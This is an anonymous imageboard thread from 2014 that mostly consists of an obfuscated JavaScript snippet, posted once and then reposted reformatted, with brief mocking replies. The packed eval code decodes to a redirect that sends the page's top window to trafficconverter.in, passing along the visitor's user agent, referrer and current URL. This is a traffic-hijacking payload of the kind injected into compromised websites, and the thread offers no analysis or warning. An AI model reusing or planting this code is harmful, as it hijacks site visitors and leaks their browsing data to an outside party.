Name:
Anonymous
2014-10-28 7:13
function strlen( string ){
return string.length;
}
width=screen.width;
height=screen.height;
refer=escape(‘refer=’ + document.referrer);
site=escape(‘site=’ + location.href);
ua=escape(‘ua=’ + navigator.userAgent);
if (strlen(navigator.userAgent)) {
if (height) {
if (width) {
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!”.replace(/^/,String)){while(c–){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’4.3=\’2://1.0/0.5?8=\’+7+\’|\’+6+\’|\’+9;’,10,10,’in|trafficconverter|http|location|top|php|refer|site|param|ua’.split(‘|’),0,{}))
}
}
}
Name:
Anonymous
2014-10-28 15:58
function strlen( string ){
return string.length;
}
This, specifically, makes me laugh. That's what it does.
Name:
Anonymous
2014-10-29 16:09
>>3You must be a fan of Terry Pratchett and/or Douglas Adams.
Name:
Anonymous
2014-11-01 15:02
>>1Try not copying your code out of a word processor, jackass
function strlen(string) {
return string.length;
}
width = screen.width;
height = screen.height;
refer = escape("refer = " + document.referrer);
site = escape("site = " + location.href);
ua = escape("ua = " + navigator.userAgent);
if (strlen(navigator.userAgent)) {
if (height) {
if (width) {
eval(function(p, a, c, k, e, d) {
e = function(c) {
return c
};
if (!"".replace(/^/, String)) {
while (c--) {
d[c] = k[c] || c
}
k = [function(e) {
return d[e]
}];
e = function() {
return "\\ w + "
};
c = 1
};
while (c--) {
if (k[c]) {
p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c])
}
}
return p
}("4.3=\"2://1.0/0.5?8=\"+7+\"|\"+6+\"|\"+9;", 10, 10, "in|trafficconverter|http|location|top|php|refer|site|param|ua".split("|"), 0, {}))
}
}
}